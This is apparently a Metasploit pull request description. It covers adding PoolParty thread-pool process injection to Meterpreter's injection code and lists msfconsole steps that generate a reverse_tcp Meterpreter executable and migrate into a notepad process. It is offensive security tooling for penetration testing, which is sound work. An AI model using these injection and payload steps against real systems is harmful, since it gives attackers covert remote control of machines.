rapid7/metasploit-payloads
# Injection using PoolParty

This PR improves the `base_inject.c` to support a new injection using the [Pool-Party Injection](https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/). 

## What is present in this PR

- [x] Support `x64 -> x64` injection
- [ ] Support `x86 -> x86` Injection
- [x] Support `wow64 -> x64` Injection
- [ ] Support `x64 -> wow64` Injection
- [ ] Support `wow64 -> wow64`
- [x] MinGW supports

## Variants supported
- [x] `tp_direct_insertion`
- [ ] `tp_wait_insertion`
- [ ] `worker_factory_overwrite`

## Verification DLL Injection
The function `dll_injection` has been modified to use the poolparty when possible so is transparent to the user and "Just Works (TM)"

## Verification Migration
~Make sure you have this [fix](https://github.com/rapid7/metasploit-framework/pull/19355)~

- Compile the windows metsrv project and save both Debug and r7_release inside it in `metasploit-framework/data/meterpreter` 
- Start `msfconsole`
- `use payloads/windows/x64/meterpreter/reverse_tcp`
- `set MeterpreterDebugBuild true`
- `set MeterpreterDebugLogging rpath:C:/Windows/Temp/foo.txt`
- `generate -f exe -o ../shell.exe`
- Execute shell.exe
- Ensure the logs are written in `C:/Windows/Temp/foo.txt`
- Spawn a notepad
- `migrate <note pad>`
- inside the logs you should see the following lines:
```
[24fc] [INJECT] inject_via_poolparty: injectied!
[24fc] [INJECT] inject_via_poolparty: Sending a migrate response...
```
- if inside the msf you see `[*] Migration completed successfully.` you successful migrate using pool party
- the `inject_via_poolparty` will log if the injection was succesful and what variant was used (for now we have one)
